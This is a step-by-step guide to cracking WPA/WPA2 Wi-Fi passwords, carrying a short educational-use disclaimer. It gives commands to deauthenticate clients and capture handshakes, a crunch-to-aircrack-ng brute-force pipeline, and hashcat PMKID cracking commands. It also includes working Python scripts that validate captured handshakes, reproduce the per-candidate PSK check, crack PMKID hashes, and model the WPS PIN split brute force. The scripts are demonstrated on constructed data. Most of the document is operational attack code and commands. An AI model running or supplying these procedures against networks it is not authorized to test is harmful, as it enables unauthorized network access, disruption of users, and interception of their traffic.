WPA Security Testing Guide
Educational Purpose Only
This guide is provided strictly for educational purposes and authorized security testing. You should only test networks that you own or have explicit written permission to test.
Unauthorized access to wireless networks is illegal and may result in serious legal consequences. Always ensure you have proper authorization before conducting any security testing.
Legal Responsibility
The author assumes no responsibility for any misuse of this information. Users are solely responsible for ensuring their activities comply with applicable laws and regulations.
Monitor Mode Setup¶
For RTL8188EUS wireless adapters (the steps are the same for any adapter whose driver supports monitor mode and frame injection):
- Stop the processes that manage the interface (NetworkManager, wpa_supplicant); otherwise they keep resetting it to managed mode
- Bring the wireless interface down
- Switch the interface to monitor mode so it captures every frame on the channel, not only traffic addressed to it, then bring it back up and confirm the mode before continuing
Network Discovery¶
Handshake Capture¶
Target Network Capture¶
- Replace `<filename>` with your desired capture file name (airodump-ng appends a sequence number and extension, so `<filename>-01.cap` is the file you hand to aircrack-ng)
Handshake Requirements
You need to capture the 4-way handshake between the access point and a client. It is only exchanged when a client (re)associates, so you get it when:
- A client naturally connects to the network while you are capturing on the target's channel
- You force an already connected client to reconnect by deauthenticating it
Force Handshake Capture¶
- This sends a single round of deauthentication frames to force the client to reconnect; the adapter must be on the target's channel for the frames (and the resulting handshake) to be seen
Parameter Explanation

| Parameter | Meaning |
|-----------|---------|
| `-a` | Access Point (BSSID) MAC address |
| `-c` | Client (station) MAC address; without it the deauthentication is broadcast to every client of the AP |
| `-0 1` | Deauthentication attack, one round (`-0 0` loops until stopped) |

Expected Result
After successful execution, airodump-ng shows `WPA handshake: <BSSID>` in its top-right corner and the EAPOL frames are in your dump file (filter on `eapol` in Wireshark to see them).
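Before spending hours on cracking, check that the dump actually holds a usable handshake. The script below is an added example, not part of the original guide and not an aircrack-ng component; it uses only the Python standard library. It walks a classic pcap (linktype 105 as airodump-ng writes, or 127 with radiotap headers), keeps the EAPOL-Key frames to or from one BSSID, classifies each as message 1 to 4 from the Key Information flags, and then checks that the replay counters pair up the way a real exchange does. The BSSID, client MAC and the four frames in `SAMPLE_CAP` are constructed so the script runs offline; against a real capture run it as `python3 check_handshake.py <filename>-01.cap <bssid>` (the script name is my choice).

```python
#!/usr/bin/env python3
"""Check a capture for a usable WPA2 4-way handshake (added example, standard library only)."""
import struct
import sys

LINKTYPE_IEEE802_11 = 105   # raw 802.11 frames, the format airodump-ng writes to .cap
LINKTYPE_RADIOTAP = 127     # radiotap header before each frame (tcpdump, hcxdumptool)
SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")  # LLC/SNAP header with EtherType 0x888e
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200  # Key Information bits

def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def classify(key_info):
    """Handshake message number from the Key Information flags, None if not M1-M4."""
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    install, secure = key_info & KI_INSTALL, key_info & KI_SECURE
    if ack and not mic:
        return 1           # AP -> STA: ANonce
    if mic and not ack and not secure:
        return 2           # STA -> AP: SNonce + MIC, the frame every cracker needs
    if ack and mic and install:
        return 3           # AP -> STA: ANonce again + GTK, MIC
    if mic and not ack and secure:
        return 4           # STA -> AP: confirmation
    return None

def iter_frames(cap):
    """Yield raw 802.11 frames from a classic pcap byte string, radiotap stripped."""
    (magic,) = struct.unpack_from("<I", cap, 0)
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap (pcapng: convert with editcap -F pcap)")
    (linktype,) = struct.unpack_from(end + "I", cap, 20)
    off = 24
    while off + 16 <= len(cap):
        (incl_len,) = struct.unpack_from(end + "I", cap, off + 8)
        pkt = cap[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if linktype == LINKTYPE_RADIOTAP:
            (rt_len,) = struct.unpack_from("<H", pkt, 2)
            pkt = pkt[rt_len:]
        elif linktype != LINKTYPE_IEEE802_11:
            raise ValueError(f"unsupported link type {linktype}")
        yield pkt

def find_handshake(cap, bssid):
    """Return {message_number: replay_counter} for EAPOL-Key frames of the given BSSID."""
    target = bytes.fromhex(bssid.replace(":", ""))
    found = {}
    for pkt in iter_frames(cap):
        if len(pkt) < 24 or (pkt[0] >> 2) & 3 != 2:   # only data frames carry EAPOL
            continue
        to_ds, from_ds = pkt[1] & 0x01, pkt[1] & 0x02
        a1, a2, a3 = pkt[4:10], pkt[10:16], pkt[16:22]
        hdr = 30 if (to_ds and from_ds) else 24          # 4-address frames are longer
        if pkt[0] & 0x80:                                # QoS data: 2-byte QoS Control field
            hdr += 2
        if (a2 if from_ds else a1 if to_ds else a3) != target:
            continue
        body = pkt[hdr:]
        if body[:8] != SNAP_EAPOL or len(body) < 25 or body[9] != 3:  # EAPOL type 3 = Key
            continue
        (key_info,) = struct.unpack_from(">H", body, 13)
        (replay,) = struct.unpack_from(">Q", body, 17)
        msg = classify(key_info)
        if msg:
            found[msg] = replay
    return found

def handshake_usable(found):
    """Crackable set: M2 (SNonce + MIC) plus M1 or M3 for the ANonce, replay counters matching."""
    if 2 not in found:
        return False
    return found.get(1) == found[2] or found.get(3) == found[2] + 1

# --- constructed sample capture (not real traffic) ---------------------------------------
def eapol_key_frame(bssid, sta, key_info, replay, from_ap):
    fc = bytes([0x08, 0x02 if from_ap else 0x01])        # data frame, FromDS or ToDS
    addrs = (sta + bssid + bssid) if from_ap else (bssid + sta + bssid)
    key = bytes([2]) + struct.pack(">HH", key_info, 16) + struct.pack(">Q", replay) + bytes(80) + b"\x00\x00"
    eapol = bytes([2, 3]) + struct.pack(">H", len(key)) + key
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + SNAP_EAPOL + eapol

def pcap_file(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out

BSSID = bytes.fromhex("0023b18208aa")   # constructed
STA = bytes.fromhex("d8fe11223344")     # constructed
SAMPLE_CAP = pcap_file([
    eapol_key_frame(BSSID, STA, 0x008A, 1, True),    # M1
    eapol_key_frame(BSSID, STA, 0x010A, 1, False),   # M2
    eapol_key_frame(BSSID, STA, 0x13CA, 2, True),    # M3
    eapol_key_frame(BSSID, STA, 0x030A, 2, False),   # M4
])

if __name__ == "__main__":
    cap = open(sys.argv[1], "rb").read() if len(sys.argv) > 2 else SAMPLE_CAP
    bssid = sys.argv[2] if len(sys.argv) > 2 else fmt_mac(BSSID)
    msgs = find_handshake(cap, bssid)
    print(f"{bssid}: messages {sorted(msgs)} usable={handshake_usable(msgs)}")
```

A capture that only holds message 1, which is what you get when the client never answers the AP, will not crack no matter how long you run aircrack-ng; message 2 carries the only MIC computed from the client's side. The script reads classic pcap only, so convert pcapng output from hcxdumptool with `editcap -F pcap in.pcapng out.cap` first.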
Password Cracking¶
Numeric Brute Force (8 Digits)¶
For networks using simple 8-digit numeric passwords (a keyspace of 10^8 candidates):

```bash
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
```

- crunch generates every 8-digit string from `00000000` upward and writes it to stdout; `aircrack-ng -w -` reads the candidates from stdin and tests each one against the handshake of the BSSID given with `-b`
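To see what aircrack-ng does with every line crunch pipes in, and why 10^8 candidates take so long, here is the per-candidate check written out in Python. This is an added example, not code from the guide or from aircrack-ng, standard library only: PBKDF2 turns the candidate into a PMK, the 802.11 PRF expands the PMK, both MACs and both nonces into the PTK, and the first 16 bytes of that (the KCK) must reproduce the MIC on the client's message 2. The SSID, MACs, nonces and the secret PSK `00000042` are constructed; the candidate generator walks the same space in the same order as `crunch 8 8 0123456789 -s 00000000`, so the demo stops after 43 candidates.

```python
#!/usr/bin/env python3
"""The check aircrack-ng runs on each candidate PSK (added example, standard library only)."""
import hashlib
import hmac
import itertools
import struct

def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). The slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11 PRF-512: PTK from PMK, both MACs and both nonces, each pair ordered min||max."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]          # KCK = PTK[0:16] is all the MIC check needs

def eapol_mic(kck, eapol_frame):
    """Descriptor version 2 (WPA2/AES): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = eapol_frame[:81] + bytes(16) + eapol_frame[97:]   # MIC sits at offsets 81..97
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def crack_handshake(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2):
    """Try each candidate; the first one whose KCK reproduces M2's MIC is the PSK."""
    target = eapol_m2[81:97]
    for pw in candidates:
        kck = prf512(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), target):
            return pw
    return None

def numeric_candidates(length=8):
    """Same keyspace and order as `crunch 8 8 0123456789 -s 00000000`: 10**8 strings, lazily."""
    return ("".join(d) for d in itertools.product("0123456789", repeat=length))

# --- constructed message 2 so the script runs offline (not a real capture) -----------------
def build_m2(kck, snonce, replay=1):
    key = bytes([2]) + struct.pack(">HH", 0x010A, 16) + struct.pack(">Q", replay) + snonce + bytes(48) + b"\x00\x00"
    frame = bytes([2, 3]) + struct.pack(">H", len(key)) + key
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]

SSID = "TestNet"                                   # constructed
AP_MAC, STA_MAC = bytes.fromhex("0023b18208aa"), bytes.fromhex("d8fe11223344")   # constructed
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))                          # constructed
SECRET_PSK = "00000042"                            # constructed, deliberately early in the space
M2 = build_m2(prf512(pmk_from_passphrase(SECRET_PSK, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], SNONCE)

if __name__ == "__main__":
    hit = crack_handshake(numeric_candidates(), SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, M2)
    print("recovered PSK:", hit)
```

Every candidate costs the 4096-round PBKDF2 before the cheap PRF and HMAC, which is why a CPU manages only thousands of candidates per second and why the SSID matters: the same passphrase on a different SSID is a different PMK.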
Performance Warning
Cracking time depends on:
- Keyspace size: every candidate costs 4096 PBKDF2-SHA1 rounds, so the full 10^8 numeric space takes hours on a CPU and minutes on a modern GPU, and longer or mixed-character passwords quickly become infeasible to exhaust
- Hardware performance: aircrack-ng is CPU-bound; hashcat on a GPU is orders of magnitude faster
- Capture quality: a handshake with a missing or corrupted message cannot be cracked at all, however fast the hardware
Dictionary Attacks
Run a dictionary attack with a common wordlist before resorting to brute force; real-world PSKs fall to wordlists and rules far more often than to exhaustive search.
Wireshark Integration¶
For manual analysis and verification of captured handshakes, open the .cap in Wireshark and filter on `eapol`: four EAPOL-Key frames between the client and the BSSID, with replay counters that pair up (messages 1 and 2 share one value, messages 3 and 4 the next), are what the cracker needs.
PSK Generator Tool
Wireshark's online WPA PSK generator takes a passphrase and SSID and outputs the 256-bit PSK (PBKDF2-HMAC-SHA1, 4096 rounds). Paste that key into Wireshark's IEEE 802.11 decryption keys as a `wpa-psk` entry to decrypt the captured traffic; if the data frames decode, the recovered password is confirmed.
PMKID Attack Method¶
WPA2-PSK networks (and WPA3 access points running in WPA2/WPA3 transition mode) can be attacked using the PMKID (Pairwise Master Key Identifier) method, which doesn't require capturing a full 4-way handshake. The PMKID is sent by the AP in the first EAPOL-Key message and is computed from the PMK plus the AP and client MAC addresses only, so it can be checked offline against password candidates just like a handshake MIC. Pure WPA3-SAE derives the PMK from the Dragonfly exchange rather than from the passphrase, so its PMKID is not crackable this way, and not every AP includes a PMKID at all.
- Captures PMKID hashes to file named "PMKID"
PMKID Advantages
- No client required: the capture tool associates with the AP itself and the AP answers with the PMKID
- Faster capture: no need to wait for a client connection
- Less disruptive: no deauthentication of legitimate clients (the tool still transmits association requests, so it is not silent)
Work in Progress
Detailed PMKID cracking steps coming maybe someday...
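Since the cracking steps are still to be written up, here is the PMKID derivation and check as an added example (Python, standard library only; not code from the guide, hcxtools or hashcat). It derives the PMK with PBKDF2, computes the PMKID the AP would send, formats it as the hashcat 22000 line that hcxpcapngtool emits, parses such a line back, and recovers the passphrase from a small wordlist. The AP and client MACs, SSID `TestNet`, PSK `password` and the wordlist are constructed.

```python
#!/usr/bin/env python3
"""PMKID derivation, hashcat 22000 line format and an offline crack (added example, stdlib only)."""
import hashlib
import hmac

def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk, ap_mac, sta_mac):
    """RSN PMKID (AKM 00-0F-AC:2) = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): no nonces involved."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def hc22000_pmkid_line(pmkid_bytes, ap_mac, sta_mac, ssid):
    """hashcat -m 22000 PMKID line: WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID_hex*** (last three fields empty)."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid_bytes.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())

def parse_hc22000(line):
    """Split a 22000 line; type 01 is a PMKID, type 02 a full EAPOL handshake."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not a hashcat 22000 line")
    return {"type": f[1], "value": bytes.fromhex(f[2]), "ap": bytes.fromhex(f[3]),
            "sta": bytes.fromhex(f[4]), "ssid": bytes.fromhex(f[5]).decode(errors="replace")}

def crack_pmkid(line, candidates):
    """Recompute the PMKID for each candidate; a match means candidate == PSK. PBKDF2 is the cost."""
    h = parse_hc22000(line)
    if h["type"] != "01":
        raise ValueError("type 02 (EAPOL) needs the PTK/MIC check, not handled here")
    for pw in candidates:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(pw, h["ssid"]), h["ap"], h["sta"]), h["value"]):
            return pw
    return None

# --- constructed sample: the line hcxpcapngtool would emit for this AP if the PSK were "password" ---
AP_MAC, STA_MAC = bytes.fromhex("0023b18208aa"), bytes.fromhex("d8fe11223344")   # constructed
SSID = "TestNet"                                                                 # constructed
SAMPLE_LINE = hc22000_pmkid_line(pmkid(pmk_from_passphrase("password", SSID), AP_MAC, STA_MAC),
                                 AP_MAC, STA_MAC, SSID)
WORDLIST = ["letmein", "TestNet2024", "password", "hunter2"]                    # constructed

if __name__ == "__main__":
    print("hash line:", SAMPLE_LINE)
    print("recovered PSK:", crack_pmkid(SAMPLE_LINE, WORDLIST))
```

For a real target the same line comes from `hcxpcapngtool -o hash.hc22000 dump.pcapng` (hcxdumptool writes the pcapng; its output option is `-w` in the 6.3 series and `-o` in older releases, so check `hcxdumptool --help` for the installed version) and the crack is `hashcat -m 22000 hash.hc22000 wordlist.txt`, with `hashcat -m 22000 --show hash.hc22000` printing recovered keys. The PMK test vector in the checks (passphrase `password`, SSID `IEEE`) is the published IEEE 802.11 one.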
WPS PIN Attack¶
WPS (Wi-Fi Protected Setup) vulnerabilities can be exploited when the access point has WPS PIN mode enabled (not Push Button Configuration): the external-registrar PIN exchange leaks whether each half of the PIN is correct.
WPS Requirements
- Access Point must have WPS PIN (external registrar) mode enabled
- Not PBC (Push Button Configuration) mode, which never exposes a PIN to brute force
- May take several hours to complete: many APs lock WPS after a few failed PINs, and the attack has to wait out each lockout
- Replace with target AP's MAC address
How WPS PIN Attack Works
A WPS PIN is 8 digits, but the last digit is a checksum of the other seven, so only 7 digits (10^7 PINs) carry information. Worse, the registrar protocol validates the PIN in two halves and NACKs at a different message for each (after M4 for a wrong first half, after M6 for a wrong second half), which tells the attacker whether the first four digits were right independently of the rest. The attack exploits this by:
- Testing the first 4 digits on their own (at most 10,000 attempts, stopping when the AP no longer NACKs after M4)
- Testing the remaining 3 digits, filling in the checksum digit for each (at most 1,000 attempts)
- Brute forcing at most 11,000 combinations instead of 10 million (100 million if the checksum is ignored)
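An added example (Python, not from the guide or from reaver) that shows where the 11,000 comes from: the checksum routine that fixes the eighth digit, and the two-stage search against a constructed registrar that answers the way an AP does (NACK after M4 for a wrong first half, NACK after M6 for a wrong second half). The target PIN `12345670` is constructed; it is a valid PIN under the checksum.

```python
#!/usr/bin/env python3
"""WPS PIN checksum and the two-stage PIN search (added example, not from the guide)."""

def wps_checksum(pin7):
    """Eighth digit of a WPS PIN: weighted digit sum (3,1,3,1,3,1,3) over the first seven, mod 10."""
    digits = [int(c) for c in f"{pin7:07d}"]
    acc = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - acc % 10) % 10

def wps_pin_valid(pin8):
    """True for the one in ten 8-digit numbers whose last digit matches the checksum."""
    return 0 <= pin8 <= 99_999_999 and wps_checksum(pin8 // 10) == pin8 % 10

def wps_pin(pin7):
    """Complete a 7-digit prefix into a valid 8-digit PIN string."""
    return f"{pin7:07d}{wps_checksum(pin7)}"

class FakeRegistrar:
    """Constructed stand-in for the AP. The real protocol NACKs after M4 when the first half is
    wrong and after M6 when the second half is wrong; that difference is the leak being exploited."""

    def __init__(self, pin):
        self.pin, self.attempts = pin, 0

    def try_pin(self, pin):
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK_M4"
        if pin[4:] != self.pin[4:]:
            return "NACK_M6"
        return "SUCCESS"

def split_bruteforce(registrar):
    """Stage 1: up to 10**4 first halves. Stage 2: up to 10**3 second halves (3 digits + checksum)."""
    first = None
    for i in range(10_000):
        if registrar.try_pin(f"{i:04d}0000") != "NACK_M4":   # anything but NACK_M4: first half is right
            first = f"{i:04d}"
            break
    if first is None:
        return None
    for j in range(1_000):
        pin = wps_pin(int(first + f"{j:03d}"))
        if registrar.try_pin(pin) == "SUCCESS":
            return pin
    return None

WORST_CASE_ATTEMPTS = 10_000 + 1_000      # 11,000, versus 10**7 for a blind search of 7 free digits

if __name__ == "__main__":
    ap = FakeRegistrar("12345670")        # constructed target PIN (passes the checksum)
    print("recovered", split_bruteforce(ap), "after", ap.attempts, "attempts")
```

Real APs add what the model leaves out: per-attempt delays, a WPS lockout after a handful of failures (reaver detects the locked state and waits), and on some firmware a fixed or randomized PIN that makes the search pointless; this is why a run is measured in hours even though the arithmetic says 11,000 tries.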
Resources & Tools¶
Essential Tools¶
- hcxdumptool: modern tool for capturing WiFi handshakes and PMKIDs (writes pcapng)
- hcxtools: companion tools, in particular hcxpcapngtool, which converts captures into hashcat's 22000 format and reports what each capture contains
- WPA-SEC: online WPA/WPA2 cracking service with distributed computing donated by its users; uploading a capture hands the handshake (and any recovered key) to a third party, so only do this when your authorization covers it
Additional References¶
Pro Tips
- Use GPU acceleration with hashcat for faster cracking
- Consider cloud-based cracking services for complex passwords, bearing in mind that the capture and any recovered key leave your control